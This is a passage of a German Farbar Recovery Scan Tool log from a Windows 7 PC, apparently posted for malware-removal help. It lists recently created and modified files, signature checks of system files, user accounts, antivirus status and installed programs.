2017-02-13 19:37 - 2006-12-08 12:02 - 00251672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_5.dll
2017-02-13 19:37 - 2006-12-08 12:00 - 00390424 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_5.dll
2017-02-13 19:37 - 2006-11-29 13:06 - 04398360 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_32.dll
2017-02-13 19:37 - 2006-11-29 13:06 - 03426072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_32.dll
2017-02-13 19:37 - 2006-11-29 13:06 - 00469264 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10.dll
2017-02-13 19:37 - 2006-11-29 13:06 - 00440080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10.dll
2017-02-13 19:37 - 2006-09-28 16:05 - 03977496 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_31.dll
2017-02-13 19:37 - 2006-09-28 16:05 - 02414360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_31.dll
2017-02-13 19:37 - 2006-09-28 16:05 - 00237848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_4.dll
2017-02-13 19:37 - 2006-09-28 16:04 - 00364824 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_4.dll
2017-02-13 19:37 - 2006-07-28 09:31 - 00083736 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_2.dll
2017-02-13 19:37 - 2006-07-28 09:30 - 00363288 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_3.dll
2017-02-13 19:37 - 2006-07-28 09:30 - 00236824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_3.dll
2017-02-13 19:37 - 2006-07-28 09:30 - 00062744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xinput1_2.dll
2017-02-13 19:37 - 2006-05-31 07:24 - 00230168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_2.dll
2017-02-13 19:37 - 2006-05-31 07:22 - 00354072 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_2.dll
2017-02-13 19:37 - 2006-03-31 12:41 - 03927248 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_30.dll
2017-02-13 19:37 - 2006-03-31 12:40 - 02388176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_30.dll
2017-02-13 19:37 - 2006-03-31 12:40 - 00352464 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_1.dll
2017-02-13 19:37 - 2006-03-31 12:39 - 00229584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_1.dll
2017-02-13 19:37 - 2006-03-31 12:39 - 00083664 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_1.dll
2017-02-13 19:37 - 2006-03-31 12:39 - 00062672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xinput1_1.dll
2017-02-13 19:37 - 2006-02-03 08:43 - 03830992 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_29.dll
2017-02-13 19:37 - 2006-02-03 08:43 - 02332368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_29.dll
2017-02-13 19:37 - 2006-02-03 08:42 - 00355536 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_0.dll
2017-02-13 19:37 - 2006-02-03 08:42 - 00230096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_0.dll
2017-02-13 19:37 - 2006-02-03 08:41 - 00016592 _____ (Microsoft Corporation) C:\Windows\system32\x3daudio1_0.dll
2017-02-13 19:37 - 2006-02-03 08:41 - 00014032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\x3daudio1_0.dll
2017-02-13 19:37 - 2005-12-05 18:09 - 03815120 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_28.dll
2017-02-13 19:37 - 2005-12-05 18:09 - 02323664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_28.dll
2017-02-13 19:37 - 2005-07-22 19:59 - 03807440 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_27.dll
2017-02-13 19:37 - 2005-07-22 19:59 - 02319568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_27.dll
2017-02-13 19:37 - 2005-05-26 15:34 - 03767504 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_26.dll
2017-02-13 19:37 - 2005-05-26 15:34 - 02297552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_26.dll
2017-02-13 19:37 - 2005-03-18 17:19 - 03823312 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_25.dll
2017-02-13 19:37 - 2005-03-18 17:19 - 02337488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_25.dll
2017-02-13 19:37 - 2005-02-05 19:45 - 03544272 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_24.dll
2017-02-13 19:37 - 2005-02-05 19:45 - 02222800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_24.dll
2017-02-13 18:30 - 2017-02-13 18:30 - 00000000 ____D C:\Windows\AVM_Driver
2017-02-13 18:30 - 2017-02-13 18:30 - 00000000 ____D C:\Users\Dominik\AVM_Driver
2017-02-13 18:30 - 2017-02-13 18:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FRITZ!WLAN
2017-02-13 18:30 - 2017-02-13 18:30 - 00000000 ____D C:\Program Files (x86)\avmwlanstick
2017-02-13 18:30 - 2015-10-01 02:00 - 02274336 _____ (AVM GmbH) C:\Windows\system32\Drivers\fwlanusb6_860.sys
2017-02-13 18:30 - 2015-10-01 02:00 - 00113656 _____ (AVM Berlin) C:\Windows\system32\fwlan6ci_860_28.dll
2017-02-13 18:30 - 2015-10-01 02:00 - 00079216 _____ C:\Windows\system32\Drivers\fwlanusb62.bin
2017-02-13 18:30 - 2015-10-01 02:00 - 00020954 _____ C:\Windows\system32\Drivers\fwlanusb62pa.bin
2017-02-13 18:30 - 2015-10-01 02:00 - 00014120 _____ (AVM Berlin) C:\Windows\system32\Drivers\avmeject.sys

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-03-12 00:48 - 2009-07-14 05:57 - 00001547 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2017-03-11 16:40 - 2011-04-12 09:06 - 00699092 _____ C:\Windows\system32\perfh007.dat
2017-03-11 16:40 - 2011-04-12 09:06 - 00149232 _____ C:\Windows\system32\perfc007.dat
2017-03-11 16:40 - 2009-07-14 06:13 - 01619284 _____ C:\Windows\system32\PerfStringBackup.INI
2017-03-11 16:40 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\inf
2017-03-11 15:25 - 2009-07-14 05:45 - 00022000 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-03-11 15:25 - 2009-07-14 05:45 - 00022000 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-03-11 15:14 - 2009-07-14 06:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-03-11 15:13 - 2016-09-17 18:04 - 00065536 _____ C:\Windows\system32\spu_storage.bin
2017-03-09 21:11 - 2016-06-26 22:14 - 00000000 ____D C:\Users\Dominik\AppData\Roaming\Raptr
2017-03-09 21:10 - 2016-06-26 21:06 - 00000000 ____D C:\Users\Dominik
2017-03-09 21:09 - 2016-07-25 00:09 - 00000000 ____D C:\Windows\pss
2017-03-09 21:09 - 2016-07-04 08:14 - 00000000 ____D C:\Users\Dominik\AppData\Roaming\Mozilla
2017-03-09 21:09 - 2009-07-14 04:20 - 00000000 ___HD C:\Windows\system32\GroupPolicy
2017-03-09 21:09 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\registration
2017-03-09 21:09 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\AppCompat
2017-03-06 20:54 - 2016-07-04 04:19 - 00000000 ____D C:\Users\Dominik\AppData\Roaming\Adobe
2017-03-06 20:17 - 2016-06-26 21:56 - 00000000 ____D C:\Program Files (x86)\Google
2017-03-06 20:11 - 2009-07-14 05:45 - 00427728 _____ C:\Windows\system32\FNTCACHE.DAT
2017-03-06 20:06 - 2016-06-26 21:07 - 00001437 _____ C:\Users\Dominik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2017-03-06 20:01 - 2011-04-12 09:21 - 00000000 ____D C:\Windows\ShellNew
2017-03-06 19:56 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\SysWOW64\GroupPolicy
2017-03-06 19:53 - 2016-06-26 21:41 - 00112320 _____ C:\Users\Dominik\AppData\Local\GDIPFONTCACHEV1.DAT
2017-03-06 19:51 - 2016-07-04 08:43 - 00002148 _____ C:\Users\Dominik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft OneDrive.lnk
2017-03-06 19:51 - 2016-07-04 08:43 - 00000000 ___RD C:\Users\Dominik\OneDrive
2017-03-06 19:47 - 2016-07-04 08:31 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2017-03-06 19:47 - 2009-07-14 04:20 - 00000000 ____D C:\Program Files\Common Files\Microsoft Shared
2017-02-25 19:01 - 2009-07-14 04:20 - 00000000 __RHD C:\Users\Public\Libraries
2017-02-23 22:43 - 2016-07-04 21:56 - 00000000 ____D C:\Windows\system32\MRT
2017-02-23 22:42 - 2016-07-04 21:56 - 138020592 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-02-19 15:07 - 2016-07-17 20:35 - 00000000 ____D C:\Users\Dominik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2017-02-19 13:33 - 2016-06-26 22:17 - 00000000 ____D C:\Users\Dominik\AppData\Local\AMD
2017-02-19 13:32 - 2016-06-26 22:02 - 00000000 ____D C:\ProgramData\Package Cache
2017-02-13 20:10 - 2016-07-25 21:40 - 00000000 ____D C:\Users\Dominik\AppData\Roaming\TS3Client
2017-02-13 18:47 - 2016-07-04 11:54 - 00000000 ____D C:\Users\Dominik\AppData\Local\Steam
2017-02-13 18:33 - 2016-06-26 21:41 - 00000000 ____D C:\Users\Dominik\AppData\Local\Google
2017-02-13 18:24 - 2009-07-14 06:09 - 00000000 ____D C:\Windows\System32\Tasks\WPD
2017-02-12 18:16 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\system32\NDF

Einige Dateien in TEMP:
====================
2016-07-04 08:14 - 2017-03-09 21:09 - 0000000 ____D () C:\Users\Dominik\AppData\Local\Temp\avgnt.exe

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-03-11 14:57

==================== Ende von FRST.txt ============================

Addition:

Code:

ATTFilter

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 11-03-2017 01
durchgeführt von Administrator (12-03-2017 00:50:32)
Gestartet von C:\Users\Administrator\Desktop
Windows 7 Enterprise Service Pack 1 (X64) (2016-06-26 20:06:52)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-2822580911-2257060262-2848143123-500 - Administrator - Enabled) => C:\Users\Administrator
Dominik (S-1-5-21-2822580911-2257060262-2848143123-1000 - Administrator - Enabled) => C:\Users\Dominik
Gast (S-1-5-21-2822580911-2257060262-2848143123-501 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Avira Antivirus (Enabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AS: Avira Antivirus (Enabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

7-Zip 16.00 (x64) (HKLM\...\7-Zip) (Version: 16.00 - Igor Pavlov)
Active Directory Authentication Library für SQL Server (Version: 13.0.1601.5 - Microsoft Corporation) Hidden
Active Directory Authentication Library für SQL Server (x86) (x32 Version: 13.0.1601.5 - Microsoft Corporation) Hidden
AMD Install Manager (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.4 - Advanced Micro Devices, Inc.)
AMD PRO Control Center (HKLM-x32\...\{BDFBDA0C-2525-4EF1-85F4-78CC66D4F878}) (Version: 1.0.0.833 - Advanced Micro Devices, Inc.)
Application Insights Tools for Visual Studio 2015 (HKLM-x32\...\{0E4C791E-B78E-477D-BD5A-CDD0985BA6EC}) (Version: 7.0.20622.1 - Microsoft Corporation)
Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.24.146 - Avira Operations GmbH & Co. KG)
Avira Browser Safety (HKLM-x32\...\{9E10EA90-5E97-43B7-A246-FC7B4F5E9493}) (Version: 1.4.5.509 - Avira Operations GmbH & Co KG)
Avira Connect (HKLM-x32\...\{845380e2-f0b5-4584-bc40-cc54345b3c06}) (Version: 1.2.77.41287 - Avira Operations GmbH & Co. KG)
Avira Connect (x32 Version: 1.2.77.41287 - Avira Operations GmbH & Co. KG) Hidden
AVM FRITZ!WLAN (HKLM-x32\...\AVMWLANCLI) (Version: 06.20.07 - AVM Berlin)
Azure AD Authentication Connected Service (x32 Version: 14.0.25420 - Microsoft Corporation) Hidden
AzureTools.Notifications (x32 Version: 2.7.30611.1601 - Microsoft Corporation) Hidden
Blend for Visual Studio SDK for .NET 4.5 (x32 Version: 3.0.40218.0 - Microsoft Corporation) Hidden
BlueStacks App Player (HKLM-x32\...\BlueStacks) (Version: 2.4.44.6257 - BlueStack Systems, Inc.)
Borderlands 2 (HKLM\...\Steam App 49520) (Version:  - Gearbox Software)
Catalyst Control Center Next Localization BR (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.0718.1747.30147 - Advanced Micro Devices, Inc.) Hidden
Counter-Strike: Global Offensive (HKLM\...\Steam App 730) (Version:  - Valve)
Devenv-Ressourcen für Microsoft Visual Studio 2015 (x32 Version: 14.0.23107 - Microsoft Corporation) Hidden
Dotfuscator and Analytics Community Edition 5.22.0 (x32 Version: 5.22.0.3788 - PreEmptive Solutions) Hidden
Dotfuscator and Analytics Community Edition Language Pack 5.22.0 de-DE (x32 Version: 5.22.0.3788 - PreEmptive Solutions) Hidden
Entity Framework 6.1.3 Tools  for Visual Studio 2015 Update 1 (HKLM-x32\...\{2A56910C-69C8-495D-8ED8-9080F0A14E58}) (Version: 14.0.41103.0 - Microsoft Corporation)
Erforderliche Komponenten für SSDT  (HKLM-x32\...\{2466E484-9D86-416B-9C88-AA533F15AF1C}) (Version: 12.0.2000.8 - Microsoft Corporation)
Erforderliche Komponenten für SSDT  (HKLM-x32\...\{FD639F4D-1460-42E6-B32D-FEC1745D0BDC}) (Version: 13.0.1601.5 - Microsoft Corporation)
Etron USB3.0 Host Controller (HKLM-x32\...\InstallShield_{DFBB738C-71D8-4DC5-B8D2-D65C37680E27}) (Version: 0.118 - Etron Technology)
Etron USB3.0 Host Controller (x32 Version: 0.118 - Etron Technology) Hidden
Fallout 4 (HKLM\...\Steam App 377160) (Version:  - Bethesda Game Studios)
FMW 1 (Version: 1.143.3 - AVG Technologies) Hidden
Gemeinsam genutzte Microsoft Azure-Komponenten für Visual Studio 2015 Sprachpaket – DEU - v1.8 (x32 Version: 1.8.40521.1 - Microsoft Corporation) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 56.0.2924.87 - Google Inc.)
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
IIS 10.0 Express (HKLM\...\{13FD7E30-D2F1-498D-ABC2-A4242DB6610E}) (Version: 10.0.1736 - Microsoft Corporation)
IIS Express Application Compatibility Database for x64 (HKLM\...\{08274920-8908-45c2-9258-8ad67ff77b09}.sdb) (Version:  - )
IIS Express Application Compatibility Database for x86 (HKLM\...\{ad846bae-d44b-4722-abad-f7420e08bcd9}.sdb) (Version:  - )
Microsoft .NET Framework 4.5 Multi-Targeting Pack (HKLM-x32\...\{56E962F0-4FB0-3C67-88DB-9EAA6EEFC493}) (Version: 4.5.50710 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (HKLM-x32\...\{6A0C6700-EA93-372C-8871-DCCF13D160A4}) (Version: 4.5.50932 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 SDK (Deutsch) (HKLM-x32\...\{CBD7095F-7211-43FD-9FE7-FB08D753AF79}) (Version: 4.5.51641 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 SDK (HKLM-x32\...\{19A5926D-66E1-46FC-854D-163AA10A52D3}) (Version: 4.5.51641 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (HKLM-x32\...\{19E8AE59-4D4A-3534-B567-6CC08FA4102E}) (Version: 4.5.51651 - Microsoft Corporation)
Microsoft .NET Framework 4.6 SDK (Deutsch) (HKLM-x32\...\{EE8BD24B-75E1-4BBF-86B9-91FE16ADE71C}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6 SDK (HKLM-x32\...\{B5915D37-0637-4A26-A3AA-C5DC9F856370}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6 Targeting Pack (HKLM-x32\...\{2CC6A4A7-AAC2-46C9-9DBB-3727B5954F65}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 SDK (Deutsch) (HKLM-x32\...\{529EFF09-750D-48B9-A47A-34A3B6248C3F}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 SDK (HKLM-x32\...\{2F0ECC80-B9E4-4485-8083-CD32F22ABD92}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (ENU) (HKLM-x32\...\{8EEB28EE-5141-411C-9CF0-9952264FE4AF}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (HKLM-x32\...\{8BC3EEC9-090F-4C53-A8DA-1BEC913040F9}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Version Manager (x64) 1.0.0-beta5 (HKLM\...\{c5a4aba3-1aba-3ef8-b2d5-c3fa37f59738}) (Version: 1.0.10609.0 - Microsoft Corporation)
Microsoft Help Viewer 2.2 (HKLM-x32\...\Microsoft Help Viewer 2.2) (Version: 2.2.25420 - Microsoft Corporation)
Microsoft Help Viewer 2.2 Sprachpaket - DEU (HKLM-x32\...\Microsoft Help Viewer 2.2 Sprachpaket - DEU) (Version: 2.2.25420 - Microsoft Corporation)
Microsoft Office 365 - de-de (HKLM\...\O365HomePremRetail - de-de) (Version: 16.0.7766.2060 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Command Line Utilities  (HKLM\...\{F09DEB00-9F41-4BC9-BA81-9F131B12B3D5}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client  (HKLM\...\{8E4BA1E5-54E8-41F0-919B-CD875B83CFCE}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2016 LocalDB  (HKLM\...\{C555970C-4C94-4A20-9869-AE7E2F84748F}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server 2016 Management Objects (x64) (HKLM\...\{264B070C-82D7-4C9C-B1CE-A0B124BCC787}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server 2016 T-SQL Language Service  (HKLM-x32\...\{4EFF12AE-599C-42A2-ACFA-0D95C3B11A19}) (Version: 13.0.14500.10 - Microsoft Corporation)
Microsoft SQL Server 2016 T-SQL ScriptDom  (HKLM\...\{E8F3D249-7DE6-4422-AC86-1CE7D5CCFA0F}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server Compact 4.0 SP1 x64 DEU  (HKLM\...\{98225B15-ECF5-4645-B5AC-F8C5E869A5D5}) (Version: 4.0.8876.1 - Microsoft Corporation)
Microsoft SQL Server Data Tools - DEU (14.0.60519.0) (HKLM-x32\...\{9F367648-EC0C-4F97-B351-D12A51E38F96}) (Version: 14.0.60519.0 - Microsoft Corporation)
Microsoft SQL Server*2014 Management Objects  (HKLM-x32\...\{4F4CB3E2-9D2F-465A-854B-8276B02F4E7D}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server*2014 Management Objects (x64) (HKLM\...\{03CB711D-679E-46ED-851B-C568418CF914}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server*2014 Transact-SQL ScriptDom  (HKLM\...\{F2A2DB39-2C5A-4764-AA0F-5AB112663FFA}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server*2014 T-SQL Language Service  (HKLM-x32\...\{06BE8B71-46C6-434B-869E-85C58EF3120A}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server*2016 Management Objects  (HKLM-x32\...\{35A7B00B-4F9C-4B4D-919C-86FFFEE46AD6}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729 (HKLM\...\{14297226-E0A0-3781-8911-E9D529552663}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{90ffcee5-8608-4e94-8c18-a4feb4f83fb8}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{4fcf070a-daac-45e9-a8b0-6850941f7ed8}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24212 (HKLM-x32\...\{323dad84-0974-4d90-a1c1-e006c7fdbb7d}) (Version: 14.0.24212.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24212 (HKLM-x32\...\{462f63a8-6347-4894-a1b3-dbfe3a4c981d}) (Version: 14.0.24212.0 - Microsoft Corporation)
Microsoft Visual Studio Community 2015 mit Updates (HKLM-x32\...\{ec2556f3-08aa-4829-8017-07d7ea9e125d}) (Version: 14.0.25420.1 - Microsoft Corporation)
Microsoft Web Deploy 3.6 (HKLM\...\{94E1227C-08A9-4962-B388-1F05D89AEA75}) (Version: 3.1238.1962 - Microsoft Corporation)
Microsoft-System-CLR-Typen für SQL Server 2014 (HKLM\...\{7F6DCED8-6A2B-4436-AF20-8F659D04E388}) (Version: 12.0.2402.29 - Microsoft Corporation)
Microsoft-System-CLR-Typen für SQL Server 2014 (HKLM-x32\...\{48BF289B-F3FA-4023-9251-80ABF7B726F9}) (Version: 12.0.2402.29 - Microsoft Corporation)
Microsoft-System-CLR-Typen für SQL Server*2016 (HKLM\...\{FEC926D4-785B-4ED7-B35D-3FA37DD29F8B}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft-System-CLR-Typen für SQL Server*2016 (HKLM-x32\...\{A37BE9D7-EAAE-4C6B-9D7E-DBD8B8D88681}) (Version: 13.0.1601.5 - Microsoft Corporation)
Mit C# erstellte geräteübergreifende Hybrid-Apps - Vorlagen - DEU (x32 Version: 14.0.23107 - Microsoft Corporation) Hidden
MSBuild/NuGet Integration 14.0 (x86) (x32 Version: 14.0.25420 - Microsoft Corporation) Hidden
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.9.2 - Notepad++ Team)
Nox APP Player (HKLM-x32\...\Nox) (Version: 3.7.1.0 - Duodian Technology Co. Ltd.)
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7766.2047 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7766.2047 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.7766.2047 - Microsoft Corporation) Hidden
